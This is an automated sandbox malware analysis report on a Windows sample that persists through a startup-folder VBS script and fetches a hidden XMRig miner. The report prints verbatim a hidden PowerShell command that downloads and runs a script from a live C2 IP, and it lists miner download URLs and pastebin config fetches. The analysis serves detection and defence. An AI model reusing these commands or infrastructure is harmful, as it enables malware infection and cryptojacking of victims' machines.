              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , ProcessId: 1848, ProcessName: wscript.exe
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7624, TargetFilename: C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7408, TargetFilename: C:\Users\user\AppData\Local\Temp\installer.ps1
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1076, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7624, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", ProcessId: 7836, ProcessName: csc.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-06T08:09:59.130589+010020362892Crypto Currency Mining Activity Detected192.168.2.4560351.1.1.153UDP
              2025-03-06T08:11:00.849298+010020362892Crypto Currency Mining Activity Detected192.168.2.4566101.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-06T08:09:11.368287+010028269302Crypto Currency Mining Activity Detected192.168.2.44986280.240.16.67443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-06T08:10:45.850614+010028033053Unknown Traffic192.168.2.449840204.79.197.203443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-06T08:09:12.012623+010028546481A Network Trojan was detected192.168.2.44973345.144.212.7716000TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-06T08:09:12.012623+010018100002Potentially Bad Traffic192.168.2.44973345.144.212.7716000TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: yjYJ8QncaF.exeAvira: detected
              Source: yjYJ8QncaF.exeVirustotal: Detection: 66%Perma Link
              Source: yjYJ8QncaF.exeReversingLabs: Detection: 60%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

              Bitcoin Miner

              barindex
              Source: Yara matchFile source: 00000009.00000002.2568842224.0000000057B10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2563552633.0000000011120000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.2584264262.000000C000222000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2591995379.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2590132663.000000C000400000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49840 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49871 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49892 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49915 version: TLS 1.2
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.pdb source: powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.pdbhP{ source: powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmpJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\AppData\Local\Temp\FB99.tmpJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.tmpJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\Jump to behavior

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2854648 - Severity 1 - ETPRO MALWARE Win32/Danabot CnC Activity (GET) : 192.168.2.4:49733 -> 45.144.212.77:16000
              Source: C:\Windows\explorer.exeNetwork Connect: 140.82.121.3 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 140.82.121.4 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 185.199.111.133 443Jump to behavior
              Source: C:\Windows\System32\notepad.exeNetwork Connect: 192.248.189.11 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 172.67.19.24 443Jump to behavior
              Source: C:\Windows\System32\notepad.exeNetwork Connect: 80.240.16.67 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 204.79.197.203 443
              Source: unknownDNS query: name: pastebin.com
              Source: unknownDNS query: name: pastebin.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 16000
              Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49733
              Source: global trafficTCP traffic: 192.168.2.4:49733 -> 45.144.212.77:16000
              Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=B2839CD2-4BE9-4400-AD2A-0BF869E77C09&user=m-3af76558b00d443a9ad81c242fa1ca4b HTTP/1.1Host: api.msn.com
              Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=F382943E-8A19-46B8-82E2-2971F42A647D&user=m-92cabb8a9a894a8da154426fc571baf3 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
              Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=25090651-CE2C-4596-9CEC-2A7C423572D8&user=m-28a30e7e33f3473abd7bc9d52e8648b1 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
              Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=2C4005B0-16EF-45D1-A50F-3A2114E679E1&user=m-c7724915d8e34d7180084956b2b46c72 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
              Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
              Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
              Source: Joe Sandbox ViewIP Address: 80.240.16.67 80.240.16.67
              Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
              Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
              Source: Joe Sandbox ViewASN Name: GITHUBUS GITHUBUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49733 -> 45.144.212.77:16000
              Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:56035 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:56610 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49862 -> 80.240.16.67:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49840 -> 204.79.197.203:443
              Source: global trafficHTTP traffic detected: GET /setup HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.144.212.77:16000Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
              Source: global trafficHTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/ea8c5442-d9b8-4ab4-85a4-be28e4f102f4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250306%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250306T070749Z&X-Amz-Expires=300&X-Amz-Signature=94f807f186fff902594da70b0bd11fe885067e4e35e90d9346a9b5ca605f6d97&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-hidden.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exeAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/ea8c5442-d9b8-4ab4-85a4-be28e4f102f4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250306%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250306T071022Z&X-Amz-Expires=300&X-Amz-Signature=69f207c00220bca909139fa44c2edc50f5c286f6798ed8fd6a19149a51a8b1ca&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-hidden.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exeAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=B2839CD2-4BE9-4400-AD2A-0BF869E77C09&user=m-3af76558b00d443a9ad81c242fa1ca4b HTTP/1.1Host: api.msn.com
              Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=F382943E-8A19-46B8-82E2-2971F42A647D&user=m-92cabb8a9a894a8da154426fc571baf3 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
              Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=25090651-CE2C-4596-9CEC-2A7C423572D8&user=m-28a30e7e33f3473abd7bc9d52e8648b1 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
              Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=2C4005B0-16EF-45D1-A50F-3A2114E679E1&user=m-c7724915d8e34d7180084956b2b46c72 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
              Source: global trafficHTTP traffic detected: GET /setup HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.144.212.77:16000Connection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: github.com
              Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: pastebin.com
              Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
              Source: global trafficDNS traffic detected: DNS query: api.msn.com
              Source: powershell.exe, 00000003.00000002.1820169013.000001D9A5CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.144.21
              Source: powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.
              Source: powershell.exe, 00000003.00000002.1820169013.000001D9A5CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77/
              Source: powershell.exe, 00000003.00000002.1820169013.000001D9A59C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77:16000
              Source: powershell.exe, 00000003.00000002.1820059614.000001D9A5790000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1851509576.000001D9BDF12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77:16000/setup
              Source: powershell.exe, 00000003.00000002.1845912601.000001D9B5813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1845912601.000001D9B5956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.1820169013.000001D9A57A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021332AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000003.00000002.1820169013.000001D9A57A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021332AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000003.00000002.1845912601.000001D9B5813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1845912601.000001D9B5956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
